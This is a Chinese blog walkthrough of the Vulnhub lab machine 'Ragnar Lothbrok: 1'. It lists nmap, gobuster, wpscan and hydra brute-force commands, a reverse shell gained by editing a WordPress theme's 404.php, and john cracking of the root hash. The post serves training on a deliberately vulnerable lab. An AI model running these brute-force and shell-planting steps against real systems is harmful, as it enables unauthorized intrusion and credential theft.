Vulnhub: Ragnar Lothbrok: 1靶机

最新推荐文章于 2024-06-13 08:44:35 发布
最新推荐文章于 2024-06-13 08:44:35 发布
阅读量787 收藏
点赞数
文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/132586512
版权

kali:192.168.111.111

靶机:192.168.111.226

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.226

作者提示修改hosts文件

目录爆破

gobuster dir -u http://armbjorn -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap,conf

secret内容

secret的内容作为密码字典爆破wordpress

wpscan --url http://armbjorn/wordpress -e u,ap,at,cb,dbe --plugins-detection aggressive
wpscan --url http://armbjorn/wordpress -U ragnar -P ./pass.txt

修改后台源码

修改完后访问http://armbjorn/wordpress/wp-content/themes/twentytwenty/404.php获得反弹shell

提权

查看/etc/passwd,目标存在ragnar用户

利用之前搜集的密码字典爆破目标ftp,得到ragnar用户密码:lagertha

hydra -l ragnar -P ./pass.txt 192.168.111.226 -s 21 ftp -t 64

切换到ragnar用户

ragnar用户家目录,在secret文件中发现root用户密码密文

tail secret

利用john爆破

john hash --wordlist=/usr/share/wordlists/rockyou.txt

切换到root

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ragnar:Ragnar git访问系统
05-15
要求 需要Nodejs 8 MongoDB 3.2 安装依赖项 npm install 源代码lint eslint用于加载javascript源代码: npm run lint 终点 POST / admin / login-管理员登录 POST / admin / users-通过admin保存用户,例如admin...
midgarts:WIP多平台Ragnarök在线MMORPG客户
04-03
Midgarts Midgarts Client是尝试编写旧经典游戏的现代客户端实现的尝试。 当前屏幕截图:目录简介(即将推出)介绍工具GRF资源管理器最新截图:例子加载GRF文件grfFilef , err := grf . Load ( "data.grf" )获得报名...
Vulnhub靶机_RAGNAR LOTHBROK: 1
学术渣渣的博客
03-22 3723
靶机 RAGNAR LOTHBROK:1
vulnhubRagnar-lothbrok
weixin_45922278的博客
03-09 439
描述 Google && Wikipedia是您的朋友 难度:容易 “当小猪知道公猪遭受了怎样的痛苦时,他们会如何尖叫” 请添加/ etc / hosts-> ip vm + armbjorn 推特:@ArmBjorn 在Virtualbox中工作。 获取root权限 一、信息收集 1.nmap端口扫描 2.http服务目录扫描器 python3 dirsearch.py -u http://192.168.152.130 -e php ...
vulnhub靶场之RAGNAR LOTHBROK: 1
weixin_42478365的博客
05-29 702
wordpress用户登录爆破,ftp用户密码爆破,john爆破hash密码
Ragnar-lothbrok靶机总结
qq_45301512的博客
12-24 116
我自己做了一遍,但是依靠网上的比较多 这个算是比较简单的 但是依赖一些工具 dirb目录扫描 wppscan的密码的暴力破解 hydra 对ftp的密码的暴力破解 join工具对root密码的破解原文: https://blog.csdn.net/weixin_39368364/article/details/121128402
Vulnhub靶场】VIKINGS: 1
DG_s1mple
03-23 1990
环境准备 下载靶机导入到vmware 靶机IP地址:192.168.2.17 攻击机IP地址:192.168.2.18 信息收集 我们使用nmap扫描一下靶机端口的开放情况 发现靶机之开放了ssh跟http服务,我们首先访问一下靶机的网站 我们点进去看看 找了一下没有什么有用的信息 渗透开始 我们扫描一下靶机网站的目录文件 发现有一个war.txt,我们去访问一下 是一串base64编码,我们把它拿去解码 使用file命令发现,是一个zip文件,我们修改后缀,把它解压出来 发现需要密码,我
靶机渗透:Vikings: 1
sev1n的博客
03-07 959
靶机分享,记录一下打靶机的过程
Vulnhub-VIKINGS: 1
Re1_zf的博客
02-03 313
1、目录扫描要灵活运用字典,尤其是这种CTF的靶机,默认字典大概率扫不出来什么东西2、密码爆破可以使用fcrackzip,不行的话再去尝试zip2john和john字典爆破3、binwalk善于查看图片等隐写内容4、根据提示信息灵活编写和查找脚本以拿到关键信息5、解码网站:https://gchq.github.io/CyberChef/6、仔细查看当前用户的所有文件的信息,对sudo 等root权限操作敏感。
vulnhub--Vikings: 1
weixin_46107179的博客
04-26 296
靶机下载地址:下载链接 主机发现 通过arp-scan -l发现主机 信息搜集 通过nmap收集ip地址信息(开放22,80端口) 进行访问80端口,发现有一个site目录,进一步访问发现主页面只有一些简单介绍,访问时,访问速度很慢,查看源代码才知道,去访问了一些谷歌等的资源,所以访问页面比较慢 然后扫描目录,发现该目录下有一个war.txt文件 访问war.txt发现这是一个路径 访问该路径,发现是通过base64加密的 下载下来并查看文件类型发现是zip类型 发现解压需要密码 用john
VulnHub靶机渗透实战9-vikings
随心所欲不逾矩
11-25 745
本次靶机是CTF风格的靶机。靶场地址:Vikings: 1 ~ VulnHub fcrackzip工具也能用来爆破密码。 用户名密码:floki/f@m0usboatbuilde7 所以boat的意思是让我们对第二十九个质数做考拉兹猜想,所得到的数的数列,其中可打印的字符(ascall可以代表的字符,256以内),就是我们要得到的首先我们编写一段简单的python代码来计算出第二十九个质数。 再编写一个简单python做考拉兹猜想,并且输出所有ascall为256以内的字
kcmsystemd:KDE的系统控制模块
06-13
Kcmsystemd KDE 的 Systemd 控制模块。 为 systemd 守护进程提供图形前端,允许查看和控制 systemd 单元,以及修改配置文件。 集成在 KDE 的系统设置对话框中。... 开发者:Ragnar Thomsen ( ) 网址: :
SC_BW_AI:包含所有Starcraft Brood War AI项目
05-28
SC_BW_AI 包含所有Starcraft Brood War AI项目纳格法尔(Nagglfar):负责将UPL囚犯从地球运送到塔尔尼斯的超级航母的旗舰... 它在Ragnarök期间运送巨人。 Nagglfar机器人是一款人性化机器人,旨在具有很高的侵略性。
awesome-pion:精选与Pion相关的令人敬畏的事物
05-13
很棒的介子 精选与Pion相关的令人敬畏的事物 资源 社区 官方常见问题 官方Slack频道 ... Ragnar-H / TelloGo Deepch / RTSPtoWebRTC giongto35 / cloud-game kdevb0x / quikface 机械加工/我的家 dialup-i
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 936
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
《软件定义安全》之八:软件定义安全案例
最新发布
大龄IT民工
06-13 1087
Embrane是一家虚拟设备提供商,由Cisco公司前员工创立,该公司致力于实现网络功能实体的软件化,旨在研发出多服务、分布式软件架构的网络服务产品。它于2015年4月被Cisco公司收购。Embrane的软件定义架构称为Heleos,利用虚拟通信设备代替原有基于专有硬件平台的设备,通过一个集中的控制台对虚拟设备进行管理和控制。Heleos与原来的应用交付网络(ADN)产品较为接近,是基于软件的L4~L7虚拟设备,包括负载均衡产品、防火墙、VPN产品和SSLOffload Engine。
NTFS安全权限
2302_80097039的博客
06-12 581
NTFS权限是基于。
《软件定义安全》之三:用软件定义的理念做安全
大龄IT民工
06-08 845
中心化的智能控制系统网络控制器就能根据上下文场景,计算网络或安全策略,快速、有效地调度网络中的流量。全局和实时流量视图SDN控制器具有全局网络实时的流量信息,这些信息在很多防护场景中非常有用。例如,在DDoS检测时,可获取物理网络处的硬件交换机的sFlow或OpenFlow流信息,然后根据数据包流的统计特征进行判断,确认是否存在恶意攻击。基于全局网络设备提供的流量信息,可构建基于流量的实时和历史知识库,进而运行时对任意访问进行分析,确认其在历史知识库中是否存在相似的模式。
ragnar's story is true or is just a myth?
03-28
As an AI language model, I cannot determine if Ragnar's story is true or just a myth as there is no concrete evidence to support either claim. Ragnar is a figure from Norse mythology, and while some ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值